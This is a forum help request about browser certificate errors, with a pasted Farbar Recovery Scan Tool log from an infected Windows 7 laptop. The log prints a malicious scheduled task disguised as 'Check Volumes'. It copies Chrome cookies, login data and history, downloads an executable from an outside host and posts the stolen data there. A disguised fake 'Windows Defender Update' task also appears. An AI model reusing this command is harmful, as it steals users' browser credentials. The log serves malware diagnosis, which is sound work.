Invalid certificates in browsers

Eddydye
Visitor
Posts: 16
Registered: 27 May 2021 16:55

#1 Post by Eddydye »

Please check the log. The browsers report invalid certificates, sometimes they say there is no internet connection, and when the browser is closed and reopened, a dialog pops up saying the process is being used by another application, but there is nothing in the process list.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-10-2021
Ran by PC (administrator) on PC-PC (ASUSTeK Computer Inc. K50IJ) (26-10-2021 16:54:41)
Running from C:\Users\PC\Desktop
Loaded Profiles: PC
Platform: Microsoft Windows 7 Home Premium (X64) Language: Čeština (Česká republika)
Default browser: IE
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe
() [File not signed] C:\Program Files\ATKGFNEX\GFNEXSrv.exe
() [File not signed] C:\ProgramData\SoundFlowPicker\SoundFlowPicker.exe
(AlcorMicro Co., Ltd.) [File not signed] C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(ASUS) [File not signed] C:\Program Files (x86)\ASUS\ATK Media\DMedia.exe
(ASUSTeK Computer Inc. -> ) C:\Program Files (x86)\ASUS\ATK Hotkey\Atouch64.exe
(ASUSTeK Computer Inc. -> ) C:\Program Files (x86)\ASUS\ControlDeck\ControlDeckStartUp.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ASUS CopyProtect\ASPG.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\AsLdrSrv.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\ATKOSD.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\HControl.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\HControlUser.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\KBFiltr.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\WDC.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATKOSD2\ATKOSD2.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\SmartLogon\sensorsrv.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\SmartLogon\smartlogon.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Windows\AsScrPro.exe
(ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Windows\System32\FBAgent.exe
(ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Windows\SysWOW64\Fast Boot\FastBootAgent.exe
(ASUSTeK Computer Inc. -> ATK) C:\Program Files\P4G\BatteryLife.exe
(ASUSTeK) [File not signed] C:\Windows\SysWOW64\ACEngSvr.exe
(ATK) [File not signed] C:\Program Files (x86)\ASUS\Splendid\ACMON.exe
(CyberLink -> CyberLink) C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvc.exe
(ELAN Microelectronics Corporation -> ELAN Microelectronic Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Google LLC -> Google LLC) [File not signed] C:\Program Files\Google\Chrome\Application\chrome.exe <29>
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler64.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Rezhabeck) [File not signed] C:\Program Files (x86)\MachinerData\main.exe
(Rezhabeck) [File not signed] C:\Program Files (x86)\MachinerData\mp3RenamerPro.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\BM\TMBMSRV.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\SfCtlCom.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\TmProxy.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\UfSeAgnt.exe
(VIA) [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDECK.EXE

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [UfSeAgnt.exe] => C:\Program Files\Trend Micro\Internet Security\UfSeAgnt.exe [1022368 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [320000 2009-04-09] (AlcorMicro Co., Ltd.) [File not signed]
HKLM\...\Run: [ETDWare] => C:\Program Files\Elantech\ETDCtrl.exe [619392 2009-06-12] (ELAN Microelectronics Corporation -> ELAN Microelectronic Corp.)
HKLM-x32\...\Run: [UpdateLBPShortCut] => C:\Program Files (x86)\CyberLink\LabelPrint\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink -> CyberLink Corp.)
HKLM-x32\...\Run: [UpdateP2GoShortCut] => C:\Program Files (x86)\CyberLink\Power2Go\MUITransfer\MUIStartMenu.exe [218408 2008-12-04] (CyberLink -> CyberLink Corp.)
HKLM-x32\...\Run: [HDAudDeck] => C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe [2244096 2009-07-13] (VIA) [File not signed]
HKLM-x32\...\Run: [HControlUser] => C:\Program Files (x86)\ASUS\ATK Hotkey\HControlUser.exe [105016 2009-06-19] (ASUSTeK Computer Inc. -> ASUS)
HKLM-x32\...\Run: [ATKOSD2] => C:\Program Files (x86)\ASUS\ATKOSD2\ATKOSD2.exe [8493624 2009-07-07] (ASUSTeK Computer Inc. -> ASUS)
HKLM-x32\...\Run: [ATKMEDIA] => C:\Program Files (x86)\ASUS\ATK Media\DMedia.exe [159744 2009-04-20] (ASUS) [File not signed]
HKLM-x32\...\Run: [Setwallpaper] => c:\programdata\SetWallpaper.cmd
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\...\Run: [Google Update] => C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\GoogleUpdateCore.exe [223816 2021-10-11] (Google LLC -> Google LLC)
HKLM\...\Windows x64\Print Processors\Canon MP250 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPD9W.DLL [28672 2010-04-24] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor MP250 series: C:\Windows\system32\CNMLM9W.DLL [336896 2010-04-24] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\95.0.4638.54\Installer\chrmstp.exe [2021-10-25] (Google LLC -> Google LLC) [File not signed]
HKLM\Software\...\Authentication\Credential Providers: [{06FE45A8-6D92-44ba-A0F1-9A9BCDC8F5A7}] -> C:\Program Files (x86)\ASUS\SmartLogon\system\FaceCredentialProvider64.dll [2009-05-01] (ASUS) [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FancyStart daemon.lnk [2009-10-06]
ShortcutTarget: FancyStart daemon.lnk -> C:\Windows\Installer\{60D6618B-153F-4353-8185-908E676E5888}\_DCE9A4DB2A5F2786140FA3.exe () [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\tmchlang.lnk [2009-10-06]
ShortcutTarget: tmchlang.lnk -> C:\Program Files\Trend Micro\Internet Security\TmChLang.exe (Trend Micro, Inc. -> Trend Micro Inc.)
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {169201BA-EF95-4DBA-A040-93D29590C6AF} - System32\Tasks\ASUSControlDeck => C:\Program Files (x86)\ASUS\ControlDeck\ControlDeckStartUp.exe [17976 2009-07-23] (ASUSTeK Computer Inc. -> )
Task: {2C093763-EE42-49CF-8891-F189A4AB542C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {326F35B1-9030-43D1-BD0D-5DBD49CECAFF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
Task: {3BA45A0D-24F6-4688-84BE-D1EA203FDFE0} - System32\Tasks\WC3 => C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe [1593344 2009-07-24] () [File not signed]
Task: {4CDF81D0-F7E2-48C8-817A-A530B90DD8DF} - System32\Tasks\Microsoft Windows Defender Update => C:\Program Files (x86)\Rezhabeck\mp3RenamerPro\mp3RenamerPro.exe
Task: {6E64456A-0201-4D80-BB77-5184B428C4FA} - System32\Tasks\Check Volumes => C:\Windows\SYSTEM32\CMD.EXE /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Local State" "C:\Users\PC\AppData\Local\Temp\OEROW4YA69" > NUL && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" http://1oivviovidwopopin.info/f2/OSJPN1IXJW.exe -s -k -o "C:\Users\PC\AppData\Local\Temp\OSJPN1IXJW.exe" && cd C:\Users\PC\AppData\Local\Temp\ && "OSJPN1IXJW.exe" V04J2WGO4Hf2 DYY04N8UKN 1Q541DFWIX OEROW4YA69 & copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\PC\AppData\Local\Temp\J1O2156BEB" > NUL && cd C:\Users\PC\AppData\Local\Temp\ && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" -X POST -H "Content-type: application/octet-stream" --data @J1O2156BEB http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppDa (the data entry has 678 more characters). <==== ATTENTION
Task: {74344F07-42C6-4622-9312-152A6B0AECFF} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {7A61CC45-675A-42D9-BC0A-D3691F5842ED} - System32\Tasks\ASUS SmartLogon Console Sensor => C:\Program Files (x86)\ASUS\SmartLogon\sensorsrv.exe [305720 2009-05-19] (ASUSTeK Computer Inc. -> ASUS)
Task: {9EA161CC-94DA-40D4-AD7B-00389FB1DC3C} - System32\Tasks\ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [684544 2009-07-23] (ATK) [File not signed]
Task: {C02341A7-0F42-4050-B91B-7BBE20935F36} - System32\Tasks\ASUS Live Update => C:\Program Files (x86)\ASUS\ASUS Live Update\ALU.exe [51768 2007-11-30] (ASUSTeK Computer Inc. -> )
Task: {CA21A731-91AF-4714-8E6F-CFE619DD08A0} - System32\Tasks\Games\UpdateCheck_S-1-5-21-1878501408-2484808434-785971923-1000 => {CA22F5B1-E06F-4A2B-94FC-21E87FE53781} C:\Windows\System32\gameux.dll [2746368 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Task: {E24D73D5-BC2A-4F11-90B0-83E312366154} - System32\Tasks\ASUS P4G => C:\Program Files\P4G\BatteryLife.exe [267832 2009-07-29] (ASUSTeK Computer Inc. -> ATK)
Task: {F53D1F2C-4DBF-4EB4-9E7F-45350BE21FBF} - System32\Tasks\ASPG => C:\Program Files (x86)\ASUS\ASUS CopyProtect\aspg.exe [163384 2009-06-29] (ASUSTeK Computer Inc. -> ASUS)
Task: {FF6375C1-1AC9-466C-80D7-F1443D3F6986} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 78.157.167.7 78.157.167.57
Tcpip\..\Interfaces\{6FBAB886-4307-4726-B9CB-F48F3A217E2B}: [DhcpNameServer] 78.157.167.7 78.157.167.57

FireFox:
========
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll [No File]
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.3 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll [2008-11-13] (Microsoft Corporation -> Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8051.1204 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2008-12-04] (Microsoft Corporation -> Microsoft Corporation)

Chrome:
=======
CHR Profile: C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default [2021-10-26]
CHR Notifications: Default -> hxxps//tadesco.org
CHR Extension: (Prezentace) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2021-01-03]
CHR Extension: (Dokumenty) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2021-01-03]
CHR Extension: (Disk Google) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-01-03]
CHR Extension: (YouTube) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2021-01-03]
CHR Extension: (Tabulky) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2021-01-03]
CHR Extension: (Dokumenty Google offline) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-10-25]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Extension: (Gmail) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-01-03]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ATKGFNEXSrv; C:\Program Files\ATKGFNEX\GFNEXSrv.exe [94208 2007-08-08] () [File not signed]
R2 FastBootAgent; C:\Windows\SysWOW64\Fast Boot\FastBootAgent.exe [306232 2009-07-24] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
S3 GoogleChromeElevationService; C:\Program Files\Google\Chrome\Application\95.0.4638.54\elevation_service.exe [1480024 2021-10-16] (Google LLC -> Google LLC) [File not signed]
R2 Main Service; C:\Program Files (x86)\MachinerData\mp3RenamerPro.exe [1683456 2021-07-05] (Rezhabeck) [File not signed]
R2 SfCtlCom; C:\Program Files\Trend Micro\Internet Security\SfCtlCom.exe [838528 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R2 SoundFlowPicker; C:\ProgramData\SoundFlowPicker\SoundFlowPicker.exe [1064960 2021-07-05] () [File not signed] <==== ATTENTION
R3 TMBMServer; C:\Program Files\Trend Micro\BM\TMBMSRV.exe [570632 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 TmProxy; C:\Program Files\Trend Micro\Internet Security\TmProxy.exe [917768 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ASMMAP64; C:\Program Files\ATKGFNEX\ASMMAP64.sys [14904 2007-07-24] (ASUSTeK Computer Inc. -> )
R3 athr; C:\Windows\System32\DRIVERS\athrx.sys [1394688 2009-06-20] (Microsoft Windows -> Atheros Communications, Inc.)
R3 ETD; C:\Windows\System32\DRIVERS\ETD.sys [112128 2009-06-12] (Microsoft Windows Hardware Compatibility Publisher -> ELAN Microelectronic Corp.)
R3 kbfiltr; C:\Windows\System32\DRIVERS\kbfiltr.sys [15416 2009-07-20] (ASUSTeK Computer Inc. -> )
R3 L1E; C:\Windows\System32\DRIVERS\L1E62x64.sys [55296 2009-06-09] (Microsoft Windows Hardware Compatibility Publisher -> Atheros Communications, Inc.)
R0 lullaby; C:\Windows\System32\DRIVERS\lullaby.sys [15928 2009-06-18] (ASUSTeK Computer Inc. -> Windows (R) Win 7 DDK provider)
R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1806400 2009-06-05] (SONIX TECHNOLOGY CO. , LTD -> )
R3 tmpreflt; C:\Windows\System32\DRIVERS\tmpreflt.sys [42000 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R1 tmtdi; C:\Windows\System32\DRIVERS\tmtdi.sys [107536 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 tmxpflt; C:\Windows\System32\DRIVERS\tmxpflt.sys [258064 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 vsapint; C:\Windows\System32\DRIVERS\vsapint.sys [1883152 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
U3 tmlwf; no ImagePath
U3 tmwfp; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-10-26 16:52 - 2021-10-26 16:54 - 000000423 _____ C:\Users\PC\Desktop\Addition.txt
2021-10-26 16:47 - 2021-10-26 16:56 - 000017006 _____ C:\Users\PC\Desktop\FRST.txt
2021-10-26 16:47 - 2021-10-26 16:55 - 000000000 ____D C:\FRST
2021-10-26 16:42 - 2021-10-26 16:42 - 002310656 _____ (Farbar) C:\Users\PC\Desktop\FRST64.exe
2021-10-25 16:56 - 2021-10-25 16:56 - 000002244 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-10-25 16:56 - 2021-10-25 16:56 - 000002203 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-10-25 16:55 - 2021-10-25 16:55 - 000003388 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2021-10-25 16:55 - 2021-10-25 16:55 - 000003260 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2021-10-11 16:33 - 2021-10-11 16:33 - 001341272 _____ (Google LLC) C:\Users\PC\Downloads\ChromeSetup.exe

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-10-26 16:57 - 2021-08-05 15:40 - 000000824 _____ C:\Windows\system32\Drivers\etc\tmvsthfud.bin
2021-10-26 16:57 - 2021-08-05 15:40 - 000000824 _____ C:\Windows\system32\Drivers\etc\tmvsthfss.bin
2021-10-26 16:57 - 2021-07-13 16:04 - 000000004 _____ C:\ProgramData\rc.dat
2021-10-26 16:51 - 2021-07-13 16:03 - 000000004 _____ C:\ProgramData\lock.dat
2021-10-26 16:48 - 2009-07-14 06:45 - 000010016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2021-10-26 16:48 - 2009-07-14 06:45 - 000010016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2021-10-26 16:43 - 2021-01-03 19:43 - 000000000 ____D C:\Program Files (x86)\Google
2021-10-26 16:42 - 2021-07-13 16:03 - 000000056 _____ C:\ProgramData\lir.bats
2021-10-26 16:42 - 2009-10-06 11:33 - 000003004 _____ C:\Windows\system32\Tasks\ASUS Live Update
2021-10-26 16:41 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2021-10-26 16:38 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\system32\NDF
2021-10-25 17:06 - 2021-02-16 16:18 - 000002262 _____ C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-10-25 17:06 - 2021-02-16 16:18 - 000002203 _____ C:\Users\PC\Desktop\Google Chrome.lnk
2021-10-25 17:06 - 2009-10-06 11:35 - 000001145 _____ C:\Windows\system32\ServiceFilter.ini
2021-10-11 16:05 - 2021-02-16 16:16 - 000003558 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA
2021-10-11 16:05 - 2021-02-16 16:16 - 000003286 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core

==================== Files in the root of some directories ========

2021-07-13 16:03 - 2021-10-26 16:51 - 000000004 _____ () C:\ProgramData\lock.dat
2021-07-13 16:04 - 2021-10-26 16:57 - 000000004 _____ () C:\ProgramData\rc.dat
2021-07-13 16:03 - 2021-07-13 16:03 - 000000008 _____ () C:\ProgramData\ts.dat
2007-06-12 18:34 - 2007-06-12 18:34 - 000035822 _____ () C:\Program Files (x86)\Common Files\ASPG_icon.ico
2008-05-22 17:35 - 2008-05-22 17:35 - 000051962 _____ () C:\Program Files (x86)\Common Files\banner.jpg
2009-04-08 19:31 - 2009-04-08 19:31 - 000106496 _____ () C:\Program Files (x86)\Common Files\CPInstallAction.dll
2008-08-12 06:45 - 2008-08-12 06:45 - 000155648 _____ (ASUS) C:\Program Files (x86)\Common Files\MSIactionall.dll

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2021-03-31 16:37
==================== End of FRST.txt ========================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-10-2021
Ran by PC (26-10-2021 16:58:02)
Running from C:\Users\PC\Desktop
Microsoft Windows 7 Home Premium (X64) (2021-01-03 17:28:21)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================


(If an entry is included in the fixlist, it will be removed.)

Administrator (S-1-5-21-1878501408-2484808434-785971923-500 - Administrator - Disabled)
Guest (S-1-5-21-1878501408-2484808434-785971923-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1878501408-2484808434-785971923-1002 - Limited - Enabled)
PC (S-1-5-21-1878501408-2484808434-785971923-1000 - Administrator - Enabled) => C:\Users\PC

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Trend Micro Internet Security (Enabled - Up to date) {48929DFC-7A52-A34F-8351-C4DBEDBD9C50}
AS: Trend Micro Internet Security (Enabled - Up to date) {F3F37C18-5C68-ACC1-B9E1-FFA9963AD6ED}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Activation Assistant for the 2007 Microsoft Office suites (HKLM-x32\...\Activation Assistant for the 2007 Microsoft Office suites) (Version: - Microsoft Corporation)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 10 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 10.0.32.18 - Adobe Systems Incorporated)
Adobe Flash Player 10 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 10.0.32.18 - Adobe Systems Incorporated)
Adobe Reader 9.1 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated)
Alcor Micro USB Card Reader (HKLM-x32\...\InstallShield_{5A22D889-FBDD-4AE8-86EC-089D45FC133E}) (Version: 1.2.17.25001 - Alcor Micro Corp.)
Asistent pro přihlášení ke službě Windows Live (HKLM-x32\...\{1E779810-ACCA-4483-BC76-12DFE055B452}) (Version: 5.000.817.1 - Microsoft Corporation)
ASUS AI Recovery (HKLM-x32\...\{06585B02-F20D-4AB2-9A64-86EF2AE0F8F0}) (Version: 1.0.6 - ASUS)
ASUS CopyProtect (HKLM-x32\...\{6B77A7F6-DD63-4F13-A6FF-83137A5AC354}) (Version: 1.0.0015 - ASUS)
ASUS FancyStart (HKLM-x32\...\{60D6618B-153F-4353-8185-908E676E5888}) (Version: 1.0.5 - ASUSTeK Computer Inc.)
ASUS LifeFrame3 (HKLM-x32\...\{1DBD1F12-ED93-49C0-A7CC-56CBDE488158}) (Version: 3.0.20 - ASUS)
ASUS Live Update (HKLM-x32\...\{E657B243-9AD4-4ECC-BE81-4CCF8D667FD0}) (Version: 2.5.9 - ASUS)
ASUS MultiFrame (HKLM-x32\...\{9D48531D-2135-49FC-BC29-ACCDA5396A76}) (Version: 1.0.0019 - ASUS)
ASUS Power4Gear Hybrid (HKLM\...\{1686C4D1-B1FD-42E8-B7A8-FB4C4DBA5BA8}) (Version: 1.1.19 - ASUS)
ASUS SmartLogon (HKLM-x32\...\{64452561-169F-4A36-A2FF-B5E118EC65F5}) (Version: 1.0.0007 - ASUS)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 1.02.0028 - ASUS)
ASUS Virtual Camera (HKLM-x32\...\{EC8BD21F-0CA0-4BBF-97D9-4A52B30041A1}) (Version: 1.0.17 - asus)
Asus_Camera_ScreenSaver (HKLM-x32\...\Asus_Camera_ScreenSaver) (Version: 2.0.0009 - ASUS)
Atheros Communications Inc.(R) AR8121/AR8113/AR8114 Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.16 - Atheros Communications Inc.)
ATK Generic Function Service (HKLM-x32\...\{D3D54F3E-C5C3-443D-978F-87A72E5616E8}) (Version: 1.00.0008 - ATK)
ATK Hotkey (HKLM-x32\...\{7C05592D-424B-46CB-B505-E0013E8E75C9}) (Version: 1.0.0051 - ASUS)
ATK Media (HKLM-x32\...\{D1E5870E-E3E5-4475-98A6-ADD614524ADF}) (Version: 2.0.0005 - ASUS)
ATKOSD2 (HKLM-x32\...\{3B05F2FB-745B-4012-ADF2-439F36B2E70B}) (Version: 7.0.0005 - ASUS)
Canon MP250 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MP250_series) (Version: - Canon Inc.)
ControlDeck (HKLM-x32\...\{5B65EF64-1DFA-414A-8C94-7BB726158E21}) (Version: 1.0.3 - ASUS)
CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1720 - CyberLink Corp.)
CyberLink Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.2713 - CyberLink Corp.)
ETDWare PS/2-x64 7.0.5.5_WHQL (HKLM\...\Elantech) (Version: - )
Fast Boot (HKLM\...\{13F4A7F3-EABC-4261-AF6B-1317777F0755}) (Version: 1.0.3 - ASUS)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 95.0.4638.54 - Google LLC)
Google Chrome (HKU\S-1-5-21-1878501408-2484808434-785971923-1000\...\Google Chrome) (Version: 94.0.4606.81 - Google LLC)
Choice Guard (HKLM-x32\...\{8FFC5648-FAF8-43A3-BC8F-42BA1E275C4E}) (Version: 1.2.87.0 - Microsoft Corporation) Hidden
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: - Intel Corporation)
Junk Mail filter update (HKLM-x32\...\{4AB8B41B-3AF1-46BE-99B0-0ACD3B300C0A}) (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
